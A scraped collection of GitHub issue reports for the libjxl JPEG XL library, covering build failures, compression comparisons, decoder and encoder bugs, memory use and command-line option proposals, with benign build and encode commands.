/usr/include/c++/14/bits/vector.tcc:123:(.text+0xdad): undefined reference to `void std::vector<jxl::extras::PackedFrame, std::allocator<jxl::extras::PackedFrame> >::_M_realloc_append<jxl::extras::PackedFrame>(jxl::extras::PackedFrame&&)'
/usr/bin/ld: lib/libjxl_extras-internal.a(exr.cc.o): in function `jxl::extras::DecodeImageEXR(jxl::Span<unsigned char const>, jxl::extras::ColorHints const&, jxl::extras::PackedPixelFile*, jxl::SizeConstraints const*)':
./obj-i686-linux-gnu/./lib/extras/dec/exr.cc:157:(.text.unlikely+0x138): undefined reference to `jxl::extras::PackedFrame::~PackedFrame()'
/usr/bin/ld: lib/libjxl_extras-internal.a(exr.cc.o): in function `jxl::StatusOr<jxl::extras::PackedFrame>::~StatusOr()':
./obj-i686-linux-gnu/./lib/jxl/base/status.h:337:(.text.unlikely+0x150): undefined reference to `jxl::extras::PackedFrame::~PackedFrame()'
```
Building without LTO works just fine (see [2] for the full build log for comparison), so for now LTO is disabled in the Debian builds (it used to work for version 0.10.2, though, and strangely it also works in the quite similar Ubuntu 25.04). Maybe you have an idea what the root cause could be?
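One guess worth trying (not verified against this package): undefined references from static archives under GCC LTO are sometimes caused by plain `ar`/`ranlib` lacking the LTO plugin, in which case pointing CMake at the LTO-aware wrappers can help:

```sh
# hypothetical extra flags for the existing CMake configure step
cmake -B obj-i686-linux-gnu -G Ninja \
  -DCMAKE_AR="$(command -v gcc-ar)" \
  -DCMAKE_RANLIB="$(command -v gcc-ranlib)"
```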
Best regards.
[1] https://buildd.debian.org/status/fetch.php?pkg=jpeg-xl&arch=i386&ver=0.11.1-1&stamp=1739052249&raw=0
[2] https://buildd.debian.org/status/fetch.php?pkg=jpeg-xl&arch=i386&ver=0.11.1-2&stamp=1741995098&raw=0 | Tests fail to build with LTO enabled | https://api.github.com/repos/libjxl/libjxl/issues/4152/comments | 0 | 2025-03-15T08:32:31Z | 2025-03-15T08:32:31Z | https://github.com/libjxl/libjxl/issues/4152 | 2,921,904,143 | 4,152 |
[
"libjxl",
"libjxl"
] | Found an image in which all other lossless methods, even PNG and gzip, beat lossless JPEG XL effort 11. (I used 7-zip -mx9 to create the gzip file.)
262144 cove.tga
24575 cove_effort06.jxl
22692 cove_effort07.jxl
18439 cove_effort08.jxl
16644 cove_effort09.jxl
15075 cove_effort10.jxl
10885 cove_effort11.jxl
10659 cove.tga.gz
10427 cove.png
10284 cove.tga.bz3
9557 cove.tga.bz2
9400 cove.tga.zpaq
8460 cove.tga.xz
7396 cove.tga.extreme10.xz
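For reproduction, the effort sweep above can be scripted as follows (assuming `cjxl` is on PATH and using the PNG from the linked archive as input; `-e 11` requires `--allow_expert_options`):

```sh
for e in 6 7 8 9 10 11; do
  cjxl cove.png "cove_effort$(printf '%02d' "$e").jxl" -d 0 -e "$e" --allow_expert_options
done
ls -lS cove_effort*.jxl
```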
The image file is "Ultima V Tile - Cove 1 1x .tga", a map of a place in Ultima 5, a game released in 1988. Files available here: [https://ultima5.ultimacodex.com/?sdm_process_download=1&download_id=5580](url) | jpeg xl worst at lossless compress of old game image | https://api.github.com/repos/libjxl/libjxl/issues/4150/comments | 11 | 2025-03-11T22:53:07Z | 2025-05-23T13:34:57Z | https://github.com/libjxl/libjxl/issues/4150 | 2,912,056,710 | 4,150 |
[
"libjxl",
"libjxl"
] | Hi )
I use the latest version of XnView MP (https://www.xnview.com/). As far as I know, it uses the jpegli encoder and decoder (mozjpeg or jpegli for reading/decoding JPEG files), but there is a problem, a very big problem....
This is the original sample, a crop straight from the camera:

This is Floyd-Steinberg dithering in XnConvert 1.104:

This is the ACDSee Pro sample:

As you can see, in ACDSee Pro 5.0 with IDE_ACDstd 5.0.56.0000 the gradient quality is the highest and there are no harsh color bands.
Please add dithering to the jpegli decoder with quality like that of ACDSee Pro 5.0. | Dither for decoding any JPEG files | https://api.github.com/repos/libjxl/libjxl/issues/4146/comments | 2 | 2025-03-08T18:19:24Z | 2025-06-18T21:18:03Z | https://github.com/libjxl/libjxl/issues/4146 | 2,904,945,223 | 4,146 |
[
"libjxl",
"libjxl"
] | **Describe the bug**
The `clamp` parameter used by multiple functions in alpha.cc sometimes means "clamp the value", and sometimes means "don't clamp the value".
`float fga = clamp ? Clamp(fg.a[x]) : fg.a[x];`
vs
`float fa = clamp ? fga[x] : Clamp(fga[x]);`
This might or might not be a bug.
If it is a bug:
- The spec needs to be read to verify that the spec doesn't have the same bug.
- The conformance tests need to be extended to capture it.
If it is not a bug:
- The parameter should (in the cases where it means "don't clamp the value") be renamed to something that makes it clearer that this is what it does. | `clamp` in alpha.cc has unclear meaning and usage | https://api.github.com/repos/libjxl/libjxl/issues/4143/comments | 1 | 2025-03-06T14:28:08Z | 2025-04-18T15:33:07Z | https://github.com/libjxl/libjxl/issues/4143 | 2,900,571,135 | 4,143 |
[
"libjxl",
"libjxl"
] | Hello,
With jxl 0.11.1 on windows 10 pro 64bits
When losslessly converting 24-bit PNG images into jxl images, I do not get any problem. The issue arises when losslessly converting a 256-color paletted PNG image:
1) the resulting jxl image is coded on 24 bits (8 bits per color), which is not an issue by itself, as the 256 colors can be losslessly recoded in this way, but
2) the resulting jxl image is not exactly the same as the the png image (but the difference is tiny)
I wonder if it is a bug or a bad parametrization on my side.
In the attached zip, I put an example.
The 256-color image test.png was converted into a jxl image with "cjxl test.png test.jxl -d 0"
The jxl image was converted back into a png image using "djxl test.jxl test_back.png"
It turns out test_back.png and test.jxl are identical, but both differ from the original test.png.
I computed the difference between the two png pixel by pixel.
For most of the pixels the difference is 0 for R, G, and B as expected, but for a few pixels the difference was R=1,G=1,B=1, R=2,G=2,B=2, or R=3,G=3,B=3.
In the zip, I included a difference.png file where the differences were multiplied by 50 to make them visible to the naked eye (this concerns mainly the four W's in the middle of the image)
[test.zip](https://github.com/user-attachments/files/19055865/test.zip)
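For anyone reproducing the comparison, the pixel-wise difference can be computed with ImageMagick (file names as in the attached zip; the multiply-by-50 step mirrors how difference.png was made):

```sh
# Count differing pixels (AE = absolute error metric):
magick compare -metric AE test.png test_back.png diff_mask.png
# Amplified difference image, as described above:
magick test.png test_back.png -compose difference -composite \
  -evaluate multiply 50 difference.png
```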
Thanks
S.
Edit: I have just seen that saving the 256-color paletted PNG as a 24-bit PNG image results in exactly the same issue. So it seems there are two quite distinct components in my previous test:
1) the lossless conversion of a 256-color paletted PNG image into a 24-bit one is not exactly lossless (PNG bug?)
2) the lossless conversion of a 256-color paletted PNG image into a jxl image by default forces the colors to be recoded on 24 bits. It is not clear to me whether there is a way to tell cjxl to keep the palette. | Lossless tranformation of a png file into a jxl file may not be really lossless for paletted images | https://api.github.com/repos/libjxl/libjxl/issues/4139/comments | 1 | 2025-03-03T16:11:03Z | 2025-03-12T12:36:30Z | https://github.com/libjxl/libjxl/issues/4139 | 2,891,676,509 | 4,139 |
[
"libjxl",
"libjxl"
] | Bitmap data to encode are `JXL_TYPE_UINT16` grayscale - I'll attach one sample.
`EncodeFrame` calls `FindTextLikePatches`, which can consume a really large amount of memory (I saw values like 1 GB under the debugger).
In the function `FindTextLikePatches` all values in the `screenshot_row` array are 1, and the following code causes the enormous allocations:
```
std::vector<
std::pair<std::pair<uint32_t, uint32_t>, std::pair<uint32_t, uint32_t>>>
queue;
size_t queue_front = 0;
for (size_t y = 0; y < frame_dim.ysize; y++) {
for (size_t x = 0; x < frame_dim.xsize; x++) {
if (!screenshot_row[screenshot_stride * (y / kPatchSide) +
(x / kPatchSide)])
continue;
queue.push_back({{x, y}, {x, y}});
}
}
```
When we encode 16 images at the same time, we exhaust all available memory. Consequently, the `push_back` might throw `std::bad_alloc`, which is not handled in the library and therefore leads to `std::abort`.
 | Extreme memory consumption inside EncodeFrame in libjxl 0.11.1 | https://api.github.com/repos/libjxl/libjxl/issues/4138/comments | 2 | 2025-03-03T09:51:10Z | 2025-03-04T08:55:43Z | https://github.com/libjxl/libjxl/issues/4138 | 2,890,721,397 | 4,138 |
[
"libjxl",
"libjxl"
] | 1) Run `djxl` on the first Adobe HDR/gain map test image here:
https://helpx.adobe.com/camera-raw/using/gain-map.html
(Download "gain map sample photos"; copyright on the first is Eric Chan IIRC - it's the "forest" one which shows the sun.)
```
djxl 01_base_hdr.{jxl,png}
```
2) Now examine the resultant image, `01_base_hdr.png` using `pngcheck -v` from `https://github.com/pnggroup/pngcheck`:
Observe: pngcheck fails.
Expect: pngcheck to succeed
The chunk name should be cLLI, not cLLi; however, that chunk name is not yet approved either (the specification is not yet at DIS stage).
Version (libjxl): 0.11.1
Platform: gentoo ~ (dev) | djxl 0.11.1 PNG: incorrect chunk name cLLi should be cLLI | https://api.github.com/repos/libjxl/libjxl/issues/4137/comments | 1 | 2025-03-03T01:39:38Z | 2025-04-27T03:08:55Z | https://github.com/libjxl/libjxl/issues/4137 | 2,889,954,310 | 4,137 |
[
"libjxl",
"libjxl"
] | I am encoding an image. All functions work fine until `JxlEncoderAddImageFrame`, which returns `JXL_ENC_ERROR`. How do I get the exact error? | JxlEncoderAddImageFrame is failing. How to get exact error? | https://api.github.com/repos/libjxl/libjxl/issues/4131/comments | 3 | 2025-02-27T09:33:32Z | 2025-02-28T20:13:46Z | https://github.com/libjxl/libjxl/issues/4131 | 2,883,949,477 | 4,131 |
[
"libjxl",
"libjxl"
] | null | Investigate a huge difference in `FlushTestLosslessProgressiveAlpha` in PR #4111 | https://api.github.com/repos/libjxl/libjxl/issues/4129/comments | 0 | 2025-02-25T19:45:37Z | 2025-02-25T19:45:37Z | https://github.com/libjxl/libjxl/issues/4129 | 2,879,407,155 | 4,129 |
[
"libjxl",
"libjxl"
] | ```
function DecodeJpegXlOneShot(const jxl: PByte; size: NativeUInt; out pixels: TBytes;
out xsize, ysize: NativeUInt; out icc_profile: TBytes): Boolean;
var
dec: PJxlDecoder;
status: JxlDecoderStatus;
info: JxlBasicInfo;
format: JxlPixelFormat;
buffer_size: Cardinal;//NativeUInt;
icc_size: Cardinal; // NativeUInt;
ret: JxlDecoderStatus;
begin
Result := False;
dec := JxlDecoderCreate(nil);
if JxlDecoderSubscribeEvents(dec, Integer(JXL_DEC_BASIC_INFO) or
Integer(JXL_DEC_COLOR_ENCODING) or Integer(JXL_DEC_FULL_IMAGE)) <> JXL_DEC_SUCCESS then
begin
WriteLn(ErrOutput, 'JxlDecoderSubscribeEvents failed');
Exit;
end;
format.num_channels := 4;
format.data_type := JXL_TYPE_UINT8;
format.endianness := JXL_NATIVE_ENDIAN ;
format.align := 0;
JxlDecoderSetInput(dec, jxl, size);
JxlDecoderCloseInput(dec);
while True do
begin
status := JxlDecoderProcessInput(dec);
case status of
JXL_DEC_ERROR:
begin
WriteLn(ErrOutput, 'Decoder error');
Exit;
end;
JXL_DEC_NEED_MORE_INPUT:
begin
WriteLn(ErrOutput, 'Unexpected need for more input');
Exit;
end;
JXL_DEC_BASIC_INFO:
begin
if JxlDecoderGetBasicInfo(dec, @info) <> JXL_DEC_SUCCESS then
begin
WriteLn('JxlDecoderGetBasicInfo failed');
Exit;
end;
xsize := info.xsize;
ysize := info.ysize;
writeln('step2');
end;
JXL_DEC_COLOR_ENCODING:
begin
end;
JXL_DEC_NEED_IMAGE_OUT_BUFFER:
begin
if JxlDecoderImageOutBufferSize(dec, @format, @buffer_size) <> JXL_DEC_SUCCESS then
begin
WriteLn('JxlDecoderImageOutBufferSize failed');
Exit;
end;
if buffer_size <> xsize * ysize * 4 then
begin
WriteLn( SysUtils.Format('Invalid buffer size %d vs %d', [buffer_size, xsize * ysize * 4]));
Exit;
end;
SetLength(pixels, xsize * ysize * 4);
ret := JxlDecoderSetImageOutBuffer(dec, @format, @pixels[0], Length(pixels) ); //here return error
if ret <> JXL_DEC_SUCCESS then
begin
WriteLn(ErrOutput, 'JxlDecoderSetImageOutBuffer failed');
Exit;
end;
end;
JXL_DEC_FULL_IMAGE: ; // Continue processing
JXL_DEC_SUCCESS:
begin
Result := True;
Exit;
end;
else
begin
WriteLn(ErrOutput, 'Unknown decoder status');
Exit;
end;
end;
end;
end;
``` | JxlDecoderSetImageOutBuffer returns error | https://api.github.com/repos/libjxl/libjxl/issues/4122/comments | 0 | 2025-02-25T12:03:45Z | 2025-02-25T19:15:27Z | https://github.com/libjxl/libjxl/issues/4122 | 2,878,175,951 | 4,122 |
[
"libjxl",
"libjxl"
] | https://github.com/libjxl/libjxl/pull/4112
### Description
The RLE encoding procedure has a bug that skips one symbol after each run. The results are still valid for further encoding; the bug just introduces unnecessary additional run stops in the sequence, reducing the ability to compress the histogram. This fix corrects the off-by-1 bug and thus gives slightly better compression; that is why the hardcoded output sizes in several tests are corrected downwards as well.
Example:
```
{12, 12, 13, 14, 15, 15, 15, 15, 7, 8, 6} histogram
{2, 0, 0, 1, 0, 3, 0, 0, 0, 1, 1} current same with +1
{2, 0, 1, 1, 4, 0, 0, 0, 1, 1, 1} correct same without +1
```
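For reference, the per-position run array from the example (run length at the start of each run, 0 at continuation positions) can be computed as in this small Python sketch; this is an illustration, not the C++ implementation being fixed:

```python
# Illustrative sketch of the "same" run array: run length at the start of each
# run, 0 at continuation positions. The buggy variant resumes scanning one
# position past the end of a run, producing the extra run stops shown above.
def run_starts(hist):
    out = [0] * len(hist)
    i = 0
    while i < len(hist):
        j = i
        while j < len(hist) and hist[j] == hist[i]:
            j += 1
        out[i] = j - i  # length of the run starting at i
        i = j           # correct: resume exactly at the next symbol
    return out

hist = [12, 12, 13, 14, 15, 15, 15, 15, 7, 8, 6]
print(run_starts(hist))  # [2, 0, 1, 1, 4, 0, 0, 0, 1, 1, 1]
```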
| Investigate compatibility / possible problems with JXL files in the wild. | https://api.github.com/repos/libjxl/libjxl/issues/4115/comments | 0 | 2025-02-24T07:47:13Z | 2025-02-24T07:47:48Z | https://github.com/libjxl/libjxl/issues/4115 | 2,874,105,919 | 4,115 |
[
"libjxl",
"libjxl"
] | **Is your feature request related to a problem? Please describe.**
I'm trying to understand why Rec. 2020/2100 PQ JPEG XL files exported from Lightroom Classic sometimes show up with the SDR range darkened in Apple's viewers and sometimes don't.
**Describe the solution you'd like**
I'd like libjxl to ship a command line tool alongside cjxl and djxl for modifying the JPEG XL color metadata strictly without changing the XYB pixel data. This would allow for things like varying the intensity_target value to see if it affects anything in a given viewer or changing a Display P3 image to declare Rec. 2020/2100 PQ to see how a notionally HDR file with all data within the P3 SDR range (assuming I understand correctly how JPEG XL maps the external color spaces to and from XYB) is handled. This would also allow changing the rendering intent value to see how a given viewer handles the different rendering intent values.
**Describe alternatives you've considered**
I have considered locating the right bits in a hex editor, but it seems too difficult.
I've tried the `--intensity_target` and `-x color_space=` options of cjxl when the input is a JPEG XL file, but 1) I can't be sure that `--intensity_target` doesn't alter what goes into the pixel data and 2) `-x color_space=` seems to have no effect when the input file is a JPEG XL file. | [Feature request] Tool for modifying the color metadata without changing the pixel data | https://api.github.com/repos/libjxl/libjxl/issues/4113/comments | 1 | 2025-02-16T18:04:02Z | 2025-02-17T12:39:42Z | https://github.com/libjxl/libjxl/issues/4113 | 2,856,246,622 | 4,113 |
[
"libjxl",
"libjxl"
] | I am trying to use libJXL in Delphi but can't get it right. I looked at decode_oneshot.cc, but it uses a parallel runner, which I don't need and which seems complicated to port. I tried gluing together functions from the library in a similar manner to decode_oneshot, but I can't get it to work. The main loop:
```
while True do begin
status := JxlDecoderProcessInput(dec);
```
never gets JXL_DEC_NEED_IMAGE_OUT_BUFFER, only JXL_DEC_BASIC_INFO, JXL_DEC_COLOR_ENCODING and JXL_DEC_SUCCESS. | Simplest possible example how to decode JXL into an array of RGBA of bytes? | https://api.github.com/repos/libjxl/libjxl/issues/4110/comments | 0 | 2025-02-13T08:16:59Z | 2025-02-25T19:15:54Z | https://github.com/libjxl/libjxl/issues/4110 | 2,850,296,314 | 4,110 |
[
"libjxl",
"libjxl"
] | **Describe the bug**
8-bit grayscale image. In standard practice, effort preset 10 compresses better than 9 (and sometimes 9 produces a larger file than the original PNG). I found an image that compresses worse at effort 10 than at 9. Latest cjxl version.
**To Reproduce**
 lossless compression 9-10
[alreadycompressed.zip](https://github.com/user-attachments/files/18722352/alreadycompressed.zip)
| Worse compression at high effort 5<10 | https://api.github.com/repos/libjxl/libjxl/issues/4107/comments | 3 | 2025-02-08T22:00:20Z | 2025-02-12T04:15:14Z | https://github.com/libjxl/libjxl/issues/4107 | 2,840,296,825 | 4,107 |
[
"libjxl",
"libjxl"
] | **Describe the bug**
```
-- CMAKE_SYSTEM_PROCESSOR is x86_64
-- tcmalloc version -- tcmalloc 2.8.0 disabled due to https://github.com/gperftools/gperftools/issues/1204
-- Compiled IDs C:GNU, C++:GNU
-- Disabled AVX512_SPR (set JPEGXL_ENABLE_AVX512_SPR to enable it)
-- Could NOT find HWY: Found unsuitable version "1.0.3", but required is at least "1.0.7" (found /usr/lib/x86_64-linux-gnu/libhwy.so)
CMake Error at third_party/CMakeLists.txt:36 (message):
Highway library (hwy) not found. Install libhwy-dev or download it to
third_party/highway from https://github.com/google/highway . Highway is
required to build JPEG XL. You can run
/media/Obelisk/Compile/libjxl/deps.sh to download this dependency.
-- Configuring incomplete, errors occurred!
```
**To Reproduce**
```
cmake \
-DCMAKE_BUILD_TYPE=Release \
-DBUILD_TESTING=OFF \
-DJPEGXL_ENABLE_DOXYGEN=OFF \
-DJPEGXL_ENABLE_MANPAGES=OFF \
-DJPEGXL_ENABLE_PLUGIN_GIMP210=OFF \
-DJPEGXL_ENABLE_BENCHMARK=OFF \
-DJPEGXL_ENABLE_EXAMPLES=OFF \
-DJPEGXL_FORCE_SYSTEM_BROTLI=ON \
-DJPEGXL_FORCE_SYSTEM_HWY=ON \
-DJPEGXL_ENABLE_JPEGLI=ON \
-DJPEGXL_ENABLE_JPEGLI_LIBJPEG=ON \
-DJPEGXL_INSTALL_JPEGLI_LIBJPEG=ON \
-DJPEGXL_ENABLE_AVX512=ON \
-DJPEGXL_ENABLE_AVX512_ZEN4=ON \
-DJPEGXL_ENABLE_PLUGINS=ON \
-DJPEGLI_LIBJPEG_LIBRARY_SOVERSION="${JPEGLI_LIBJPEG_LIBRARY_SOVERSION}" \
-DJPEGLI_LIBJPEG_LIBRARY_VERSION="${JPEGLI_LIBJPEG_LIBRARY_VERSION}" \
-DLIBJPEG_TURBO_VERSION_NUMBER=2001005 \
..
```
**Expected behavior**
No Errors
**Environment**
- OS: Debian Bookworm
- Compiler version: cmake version 3.25.1
- CPU type: X64 i7700k
- 0.11.0 4df1e9eccdf86b8df4c0c7c08f529263906f9c4f
**Additional context**
```
pkg-config --modversion libhwy
1.2.0
```
```
libhwy-dev/now 1.2.0-2+b2 amd64 [installed,local]
libhwy1t64/now 1.2.0-2+b2 amd64 [installed,local]
```
```
# find /usr/lib/x86_64-linux-gnu/ |grep libhwy
/usr/lib/x86_64-linux-gnu/pkgconfig/libhwy-test.pc
/usr/lib/x86_64-linux-gnu/pkgconfig/libhwy.pc
/usr/lib/x86_64-linux-gnu/pkgconfig/libhwy-contrib.pc
/usr/lib/x86_64-linux-gnu/libhwy.so.1
/usr/lib/x86_64-linux-gnu/libhwy_test.so.1
/usr/lib/x86_64-linux-gnu/libhwy.so.1.2.0
/usr/lib/x86_64-linux-gnu/libhwy_contrib.so
/usr/lib/x86_64-linux-gnu/libhwy.so
/usr/lib/x86_64-linux-gnu/libhwy_test.so
/usr/lib/x86_64-linux-gnu/libhwy_contrib.so.1
/usr/lib/x86_64-linux-gnu/libhwy_test.so.1.2.0
/usr/lib/x86_64-linux-gnu/libhwy_contrib.so.1.2.0
```
```
# nano /usr/lib/x86_64-linux-gnu/pkgconfig/libhwy.pc
prefix=/usr
exec_prefix=${prefix}
libdir=${exec_prefix}/lib/x86_64-linux-gnu
includedir=${prefix}/include
Name: libhwy
Description: Efficient and performance-portable SIMD wrapper
Version: 1.2.0
Libs: -L${libdir} -lhwy
Cflags: -I${includedir} -DHWY_SHARED_DEFINE
``` | Highway is Detected as 1.0.3 Regardless of Version. 1.2.0 Installed - Cannot Compile libjlx | https://api.github.com/repos/libjxl/libjxl/issues/4106/comments | 0 | 2025-02-04T18:09:07Z | 2025-02-13T23:40:20Z | https://github.com/libjxl/libjxl/issues/4106 | 2,830,960,956 | 4,106 |
[
"libjxl",
"libjxl"
] | **Describe the bug**
```
./deps.sh: 69: [[: not found
./deps.sh: 34: Bad substitution
```
**Expected behavior**
No Errors
**Environment**
- OS: Debian Bookworm
- Compiler version: cmake version 3.25.1
- CPU type: x64 i7700k
- 0.11.0 4df1e9eccdf86b8df4c0c7c08f529263906f9c4f
**Additional context**
Fails every time even with full git pull.
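These errors are classic symptoms of running a bash script under a POSIX shell (e.g. `sh ./deps.sh`, or a `/bin/sh` that is dash): `[[ ]]` and `${var//…}` substitutions are bashisms, so invoking the script with `bash ./deps.sh` should avoid them. A small illustrative scan (hypothetical helper, not part of the repository):

```python
import re

# Patterns for a few common bashisms that POSIX sh rejects with errors like
# "[[: not found" (line 69) and "Bad substitution" (line 34).
BASHISMS = [r"\[\[", r"\$\{\w+//", r"\$\{\w+:\d"]  # [[ ]], ${x//a/b}, ${x:0:2}

def find_bashisms(script_text):
    hits = []
    for lineno, line in enumerate(script_text.splitlines(), 1):
        if any(re.search(pat, line) for pat in BASHISMS):
            hits.append((lineno, line.strip()))
    return hits

demo = "#!/usr/bin/env bash\nif [[ -d third_party ]]; then\n  echo ${PWD//\\//_}\nfi\n"
print(find_bashisms(demo))  # lines 2 and 3 are flagged
```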
<!--
Currently github does not allow uploading files that end in `.jxl`, but when you
rename them for example as `image.jxl.jpg`, it will be possible to upload them
and also view them in browsers that are configured to support it.
See https://github.com/orgs/github-community/discussions/18139
-->
| deps.sh fails with errors in bash. (user error) | https://api.github.com/repos/libjxl/libjxl/issues/4105/comments | 5 | 2025-02-04T18:03:26Z | 2025-02-07T04:32:29Z | https://github.com/libjxl/libjxl/issues/4105 | 2,830,950,225 | 4,105 |
[
"libjxl",
"libjxl"
] | null | Test that decoder does not reorder patches | https://api.github.com/repos/libjxl/libjxl/issues/4102/comments | 1 | 2025-02-03T15:45:19Z | 2025-02-24T08:27:06Z | https://github.com/libjxl/libjxl/issues/4102 | 2,827,879,926 | 4,102 |
[
"libjxl",
"libjxl"
] | **Describe the bug**
Converting a layered JXL image using `cjxl` will lead to those layers being coalesced during the conversion.
**To Reproduce**
I have attached a layered JXL image with PNG extension.
To test yourself: create a layered JXL image; this is possible with Krita.
Using `jxlinfo` on the file shows the following:
```
JPEG XL file format container (ISO/IEC 18181-2)
JPEG XL image, 500x500, (possibly) lossless, 8-bit RGB+Alpha
Color space: 9080-byte ICC profile, CMM type: "lcms", color space: "RGB ", rendering intent: 0
layer: full image size, name: "Auswahlmaske"
layer: full image size, name: "Background"
layer: 405x196 at position (48,149), name: "Text"
```
Run any `cjxl` operation on the file, lossless or lossy.
For example:
`cjxl -d 0 -e 7 JXL-layer-test.jxl JXL-layer-test-reencode.jxl`
Running `jxlinfo` on the reencoded file now shows
```
JPEG XL image, 500x500, (possibly) lossless, 8-bit RGB+Alpha
Color space: 9080-byte ICC profile, CMM type: "lcms", color space: "RGB ", rendering intent: 0
```
The layers were coalesced during the conversion, making this a lossy operation.

**Expected behavior**
The layers should be retained if an image is converted using libjxl.
I assume that djxl behaves the same way, but have not tested decoding to EXR using an older libjxl version.
**Environment**
- OS: EndeavourOS
- CPU type: x86_64
- cjxl/djxl version string: cjxl v0.11.1 794a5dcf [AVX2,SSE4,SSE2]
| cjxl does not retain layers, coalescing/flattening layers in JXL-to-JXL conversion | https://api.github.com/repos/libjxl/libjxl/issues/4097/comments | 0 | 2025-01-30T12:22:01Z | 2025-01-30T12:22:01Z | https://github.com/libjxl/libjxl/issues/4097 | 2,820,691,046 | 4,097 |
[
"libjxl",
"libjxl"
] | The PNG spec (REC-PNG-20031110) is contradictory on whether to allow PNG files that have both iCCP and sRGB chunks.
The spec implies in 11.3.3.3 (iCCP Embedded ICC profile) that it should be prohibited:
> A PNG datastream should contain at most one embedded profile, whether specified explicitly with an iCCP chunk or implicitly with an sRGB chunk.
but then contradicts it in 11.3.3.5 (sRGB Standard RGB colour space) by merely recommending that the two do not both appear, without explicitly prohibiting it:
> It is recommended that the sRGB and iCCP chunks do not both appear in a PNG datastream.
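For concreteness, a minimal Python sketch (a hypothetical helper, not libjxl code) that walks PNG chunks and detects the iCCP + sRGB combination; the synthetic PNG built here is only structurally valid enough for chunk walking:

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"

def chunk_types(png_bytes):
    """Return the chunk type names of a PNG datastream, in order."""
    assert png_bytes[:8] == PNG_SIG
    pos, types = 8, []
    while pos < len(png_bytes):
        length = struct.unpack(">I", png_bytes[pos:pos + 4])[0]
        types.append(png_bytes[pos + 4:pos + 8].decode("ascii"))
        pos += 12 + length  # 4 length + 4 type + data + 4 CRC
    return types

def make_chunk(ctype, data=b""):
    return (struct.pack(">I", len(data)) + ctype + data +
            struct.pack(">I", zlib.crc32(ctype + data)))

# Toy datastream with both chunks present (IHDR/iCCP payloads are dummies).
png = (PNG_SIG + make_chunk(b"IHDR", b"\x00" * 13) +
       make_chunk(b"sRGB", b"\x00") +
       make_chunk(b"iCCP", b"p\x00\x00" + zlib.compress(b"")) +
       make_chunk(b"IEND"))
t = chunk_types(png)
print("iCCP" in t and "sRGB" in t)  # True
```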
I have come across an image with both chunks that works in other decoders but cannot be decoded with libjxl.
Instead of throwing `return JXL_FAILURE("Repeated iCCP / sRGB chunk");`, perhaps emitting a debug warning and continuing, e.g. `JXL_DEBUG_V(2, "Repeated iCCP / sRGB chunk; iCCP chunk ignored"); continue;`, would work here? | Allow png with iCCP and sRGB chunks | https://api.github.com/repos/libjxl/libjxl/issues/4087/comments | 1 | 2025-01-27T08:28:19Z | 2025-01-27T09:18:03Z | https://github.com/libjxl/libjxl/issues/4087 | 2,812,370,892 | 4087 |
[
"libjxl",
"libjxl"
] | [example.zip](https://github.com/user-attachments/files/18551544/example.zip)
It's a rare example but I'm curious why JXL is the worst here.
All three have been compressed using maximum compression. | Bigger than PNG? | https://api.github.com/repos/libjxl/libjxl/issues/4086/comments | 1 | 2025-01-26T20:12:56Z | 2025-01-27T07:32:33Z | https://github.com/libjxl/libjxl/issues/4086 | 2,811,765,209 | 4,086 |
[
"libjxl",
"libjxl"
] | **To Reproduce**
With `djxl Test.jxl Test.png --display_nits 1`, an extremely dark image should be output, but the image and file size remain the same regardless of the setting.
**Environment**
- OS: Windows 10
- CPU type: x86_64
- cjxl/djxl version string: JPEG XL decoder v0.12.0 3d7cec2 [AVX2,SSE2] | djxl --display_nits has no effect | https://api.github.com/repos/libjxl/libjxl/issues/4085/comments | 0 | 2025-01-25T02:02:34Z | 2025-01-25T02:02:34Z | https://github.com/libjxl/libjxl/issues/4085 | 2,810,694,199 | 4,085 |
[
"libjxl",
"libjxl"
] | 

[code.zip](https://github.com/user-attachments/files/18521278/code.zip) | Lossy compression of extra channels with pixeltype float results in unexpectedly large files | https://api.github.com/repos/libjxl/libjxl/issues/4082/comments | 2 | 2025-01-23T13:43:23Z | 2025-01-23T18:32:48Z | https://github.com/libjxl/libjxl/issues/4082 | 2,806,947,741 | 4,082 |
[
"libjxl",
"libjxl"
] | **Is your feature request related to a problem? Please describe.**
The `-j` flags in the encoder and decoder do nearly opposite things, which is confusing.
Suppose a user wants to losslessly transcode a JPEG to JPEG-XL. `cjxl --help -v` tells them this:
```
-j 0|1, --lossless_jpeg=0|1
If the input is JPEG, losslessly transcode JPEG, rather than using reencode pixels.
```
.. so they use `-j 1` to enable lossless JPEG mode in the encoder. Naturally, they assume that the decoder needs a similar `-j` option to decode the image. However, the `-j` option of `djxl` does the opposite - it causes the decoder to decode to pixels instead of reconstructing the original JPEG.
This behaviour is unintuitive because the 2 `-j` options do opposite things - in the encoder, it means to encode losslessly, but in the decoder, it means to decode lossily.
**Describe the solution you'd like**
The `-j` option in the decoder should take a `0` or `1` argument like the encoder, with the opposite meaning to what it does now. e.g. `0` -> decode lossily, `1` -> decode losslessly (reconstruct the original). The default should be 1, and the long option, `--pixels_to_jpeg`, should map to `-j 0`. Then if `-j` is specified without an argument, an error should be raised, explaining the new behaviour, which is the opposite of the previous behaviour of `djxl`.
This solution isn't perfect. Even with the error message, some users may incorrectly assume that the old `djxl -j` maps to the new `djxl -j 1`, but IMO it's better to make this change now, before 1.0, than it is to get stuck with the `cjxl` and `djxl` options having opposite meanings.
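A sketch of the proposed semantics (hypothetical code, not the actual djxl argument parser):

```python
# Hypothetical model of the proposal: -j takes an explicit 0/1 argument,
# defaults to 1 (reconstruct the original JPEG), and a bare -j is an error.
def parse_j(argv):
    mode = 1  # default: lossless reconstruction
    it = iter(argv)
    for arg in it:
        if arg == "--pixels_to_jpeg":
            mode = 0  # long option maps to -j 0 (decode to pixels)
        elif arg == "-j":
            val = next(it, None)
            if val not in ("0", "1"):
                raise SystemExit("-j requires 0 or 1; the old bare -j "
                                 "meant the opposite (decode to pixels)")
            mode = int(val)
    return mode

assert parse_j([]) == 1                     # default: reconstruct JPEG
assert parse_j(["-j", "0"]) == 0            # explicit lossy decode
assert parse_j(["--pixels_to_jpeg"]) == 0   # long form
```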
**Describe alternatives you've considered**
Inverting the existing behaviour of the `-j` flag of `djxl`. This is a bad idea as it silently changes the tool's behaviour. Things like scripts should be using the long form, `--pixels_to_jpeg`, but IMO that's not sufficient justification to change the behaviour of the short option.
Doing nothing. If users already have workflows that are set up, perhaps keeping the existing semantics is the correct option, even if it is confusing. "RTFM".
**Additional context**
Note: I'm using version 0.7.0. Maybe this was already changed in later releases, but I couldn't find anything.
